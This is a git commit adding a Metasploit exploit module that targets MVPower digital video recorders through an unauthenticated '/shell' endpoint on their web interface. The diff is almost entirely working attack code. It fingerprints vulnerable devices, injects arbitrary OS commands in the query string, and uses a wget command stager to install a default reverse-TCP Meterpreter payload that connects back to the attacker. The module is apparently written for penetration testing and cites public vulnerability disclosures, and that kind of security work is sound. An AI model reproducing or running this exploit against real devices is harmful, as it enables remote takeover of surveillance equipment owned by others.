Add MVPower DVR Shell Unauthenticated Command Execution module

bcoles · bcoles · commit e491f01c708f · 2017-02-22T05:15:57.000Z
diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command execution
+        vulnerability in MVPower digital video recorders. The 'shell' file
+        on the web interface executes arbitrary operating system commands in
+        the query string.
+
+        This module was tested successfully on a MVPower model TV-7104HE with
+        firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+        The TV-7108HE model is also reportedly affected, but untested.
+      },
+      'Author'      =>
+        [
+          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
+          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'References'  =>
+        [
+          # Comment from Paul Davies contains probably the first published PoC
+          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
+          # Writeup with PoC by Andrew Tierney from Pen Test Partners
+          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
+        ],
+      'DisclosureDate' => 'Aug 23 2015',
+      'Privileged'     => true, # BusyBox
+      'Arch'           => ARCH_ARMLE,
+      'DefaultOptions' =>
+        {
+          'Payload' => 'linux/armle/mettle_reverse_tcp'
+        },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget'  => 0))
+    deregister_options('CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
+      res = send_request_cgi({
+        'uri' => "/shell?echo+#{fingerprint}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      })
+      if res && res.body =~ /#{fingerprint}/
+        return Exploit::CheckCode::Vulnerable
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      res = send_request_cgi({
+        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Connecting to target")
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
+    end
+
+    print_good("#{peer} - Target is vulnerable!")
+
+    execute_cmdstager(flavor: :wget, linemax: 1500)
+  end
+end
